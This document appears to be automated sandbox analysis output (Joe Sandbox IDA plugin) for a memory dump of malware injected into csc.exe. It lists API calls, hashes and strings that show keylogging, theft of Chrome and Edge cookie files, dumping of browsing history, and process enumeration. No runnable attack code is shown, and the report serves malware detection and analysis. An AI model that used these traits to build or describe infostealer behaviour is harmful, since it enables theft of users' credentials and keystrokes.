                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
                                                                                                                                                                                      • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                                                                                                                                                                                      • Opcode Fuzzy Hash: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                                                                                                                                                                      • _free.LIBCMT ref: 004493BD
                                                                                                                                                                                        • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                                                                                                                                        • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                                                                                                                                      • _free.LIBCMT ref: 00449589
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1286116820-0
                                                                                                                                                                                      • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                                                                                                                                                                      • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                                                                                                                                                                      • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                                                                                                                                                                                        • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                                                                                                                                                                                        • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                                                                                                                                                        • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4269425633-0
                                                                                                                                                                                      • Opcode ID: 371d05c907dcca9c3c12ab80cf798e7523ffd5e5ecf3e3ca40c8afe2c02f4cbd
                                                                                                                                                                                      • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 371d05c907dcca9c3c12ab80cf798e7523ffd5e5ecf3e3ca40c8afe2c02f4cbd
                                                                                                                                                                                      • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                                                                                                                                                                        • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                                                                                                                                                                                      • _free.LIBCMT ref: 0044F3BF
                                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 336800556-0
                                                                                                                                                                                      • Opcode ID: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
                                                                                                                                                                                      • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                                                                                                                                                                                      • Opcode Fuzzy Hash: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C44D
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C459
                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00000000,00000000,00406F85,00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C46A
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C477
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$CloseHandle$CreatePointerWrite
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1852769593-0
                                                                                                                                                                                      • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                                                                                                                                                                      • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                                                                                                                                                                                      • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                                                                                                                                                                      • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _free.LIBCMT ref: 004509D4
                                                                                                                                                                                        • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                                                                                                                                        • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                                                                                                                                      • _free.LIBCMT ref: 004509E6
                                                                                                                                                                                      • _free.LIBCMT ref: 004509F8
                                                                                                                                                                                      • _free.LIBCMT ref: 00450A0A
                                                                                                                                                                                      • _free.LIBCMT ref: 00450A1C
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                      • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                                                                                                      • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                                                                                                      • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _free.LIBCMT ref: 00444066
                                                                                                                                                                                        • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                                                                                                                                        • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                                                                                                                                      • _free.LIBCMT ref: 00444078
                                                                                                                                                                                      • _free.LIBCMT ref: 0044408B
                                                                                                                                                                                      • _free.LIBCMT ref: 0044409C
                                                                                                                                                                                      • _free.LIBCMT ref: 004440AD
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                      • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                                                                                                      • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                                                                                                                                                                                      • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                                                                                                      • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _strpbrk.LIBCMT ref: 0044E738
                                                                                                                                                                                      • _free.LIBCMT ref: 0044E855
                                                                                                                                                                                        • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0043BCEB,?,?,?,?,?,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000), ref: 0043BD1B
                                                                                                                                                                                        • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417), ref: 0043BD3D
                                                                                                                                                                                        • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000), ref: 0043BD44
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                                                                                      • String ID: *?$.
                                                                                                                                                                                      • API String ID: 2812119850-3972193922
                                                                                                                                                                                      • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                                                                                                                                                                      • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                                                                                                                                                                      • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                      • String ID: `#D$`#D
                                                                                                                                                                                      • API String ID: 885266447-2450397995
                                                                                                                                                                                      • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                                                                                                                                                                      • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                                                                                                                                                                                      • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                                                                                                                                                                      • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe,00000104), ref: 00443475
                                                                                                                                                                                      • _free.LIBCMT ref: 00443540
                                                                                                                                                                                      • _free.LIBCMT ref: 0044354A
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$FileModuleName
                                                                                                                                                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                      • API String ID: 2506810119-4268453932
                                                                                                                                                                                      • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                                                                                                                                                                      • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                                                                                                                                                                                      • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0044BB7E,?,00000000,FF8BC35D), ref: 0044B8D2
                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B900
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0044B931
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                                                                      • String ID: PkGNG
                                                                                                                                                                                      • API String ID: 2456169464-263838557
                                                                                                                                                                                      • Opcode ID: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
                                                                                                                                                                                      • Instruction ID: a4f89274a665815b2d7bd0a52cbb4c71b9b2878c435ac706d73e761117ab6cd9
                                                                                                                                                                                      • Opcode Fuzzy Hash: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
                                                                                                                                                                                      • Instruction Fuzzy Hash: 18317271A002199FDB14DF59DC809EAB7B8EB48305F0444BEE90AD7260DB34ED80CBA4
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                                                                                                                                        • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                                                                                                                                                                        • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                                                                                                                                                                        • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                                                                                                                                                                        • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                                                                                                                                                                      • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                                                                                      • String ID: /sort "Visit Time" /stext "$0NG
                                                                                                                                                                                      • API String ID: 368326130-3219657780
                                                                                                                                                                                      • Opcode ID: 074ad0252c5f85a0395eaa63b88ebd601cb6552471d06d252c91316da9998368
                                                                                                                                                                                      • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                                                                                                                                                                                      • Opcode Fuzzy Hash: 074ad0252c5f85a0395eaa63b88ebd601cb6552471d06d252c91316da9998368
                                                                                                                                                                                      • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _wcslen.LIBCMT ref: 004162F5
                                                                                                                                                                                        • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                                                                                                                                                        • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                                                                                                                                                                        • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                                                                                                                                                                        • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _wcslen$CloseCreateValue
                                                                                                                                                                                      • String ID: !D@$okmode$PG
                                                                                                                                                                                      • API String ID: 3411444782-3370592832
                                                                                                                                                                                      • Opcode ID: 3229767f42b224c22e38ab05f87ced9dbd25ea478007aec8b0515c8cef1bdfe3
                                                                                                                                                                                      • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3229767f42b224c22e38ab05f87ced9dbd25ea478007aec8b0515c8cef1bdfe3
                                                                                                                                                                                      • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                                                                                                                                                                      • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                                                                                                                                                                      • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                                                                                                                                                                      • User Data\Default\Network\Cookies, xrefs: 0040C603
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExistsFilePath
                                                                                                                                                                                      • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                                                                                      • API String ID: 1174141254-1980882731
                                                                                                                                                                                      • Opcode ID: ec0199523fc237e56364718817167f2e0688e89b82cc13cff5a9b1f21d5ed8d2
                                                                                                                                                                                      • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                                                                                                                                                                                      • Opcode Fuzzy Hash: ec0199523fc237e56364718817167f2e0688e89b82cc13cff5a9b1f21d5ed8d2
                                                                                                                                                                                      • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                                                                                                                                                                      • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                                                                                                                                                                                      • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                                                                                                                                                                      • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExistsFilePath
                                                                                                                                                                                      • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                                                                                      • API String ID: 1174141254-1980882731
                                                                                                                                                                                      • Opcode ID: 830e565da1f4430f56a3fad2b3585c60fae3d202001501423d8e3de01861922a
                                                                                                                                                                                      • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                                                                                                                                                                                      • Opcode Fuzzy Hash: 830e565da1f4430f56a3fad2b3585c60fae3d202001501423d8e3de01861922a
                                                                                                                                                                                      • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,0040A27D,004750F0,00000000,00000000), ref: 0040A1FE
                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,0040A267,004750F0,00000000,00000000), ref: 0040A20E
                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,0040A289,004750F0,00000000,00000000), ref: 0040A21A
                                                                                                                                                                                        • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                                                                                                                                                                        • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateThread$LocalTimewsprintf
                                                                                                                                                                                      • String ID: Offline Keylogger Started
                                                                                                                                                                                      • API String ID: 465354869-4114347211
                                                                                                                                                                                      • Opcode ID: 739852a997fc0ae6182b294a28b4bb93c4a2cbea1e12e060c92b97aef043fd25
                                                                                                                                                                                      • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                                                                                                                                                                                      • Opcode Fuzzy Hash: 739852a997fc0ae6182b294a28b4bb93c4a2cbea1e12e060c92b97aef043fd25
                                                                                                                                                                                      • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
